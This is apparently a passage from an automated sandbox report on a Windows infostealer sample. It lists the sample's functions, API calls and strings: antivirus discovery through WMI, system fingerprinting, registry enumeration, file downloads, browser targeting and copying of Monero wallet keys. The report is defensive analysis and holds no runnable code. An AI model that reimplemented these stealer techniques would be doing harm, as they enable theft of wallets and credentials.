                                                                                                                            • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                            • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                            Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                              • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                              • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                            • API String ID: 4288110179-315474579
                                                                                                                            • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                            • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                            • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                            • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                            Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004012A7
                                                                                                                            • _memset.LIBCMT ref: 004012B6
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                              • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                              • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                              • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                            • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2891980384-0
                                                                                                                            • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                            • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                            • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                            • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                            Function 00411203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                            • wsprintfA.USER32 ref: 004112DD
                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                            • API String ID: 2394436309-3278919252
                                                                                                                            • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                            • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                            • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                            • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                            Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                            • wsprintfA.USER32 ref: 00410AA7
                                                                                                                            • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                              • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                              • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                              • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                              • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                            • String ID: wA$:\$C$QuBi
                                                                                                                            • API String ID: 1856320939-1441494722
                                                                                                                            • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                            • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                            • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                            • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                            Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                            • String ID: <+A
                                                                                                                            • API String ID: 2507841554-2778417545
                                                                                                                            • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                            • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                            • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                            • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                            Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                            • API String ID: 4174444224-1526165396
                                                                                                                            • Opcode ID: df153083d6535c7c34a5befce146155da6869fd2f995a743f7612deb0ce2170b
                                                                                                                            • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                            • Opcode Fuzzy Hash: df153083d6535c7c34a5befce146155da6869fd2f995a743f7612deb0ce2170b
                                                                                                                            • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                            Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy
                                                                                                                            • String ID: Stable\$ Stable\$firefox
                                                                                                                            • API String ID: 3722407311-2697854757
                                                                                                                            • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                            • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                            • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                            • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                            Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401ADC
                                                                                                                              • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                              • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                              • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                              • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                              • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
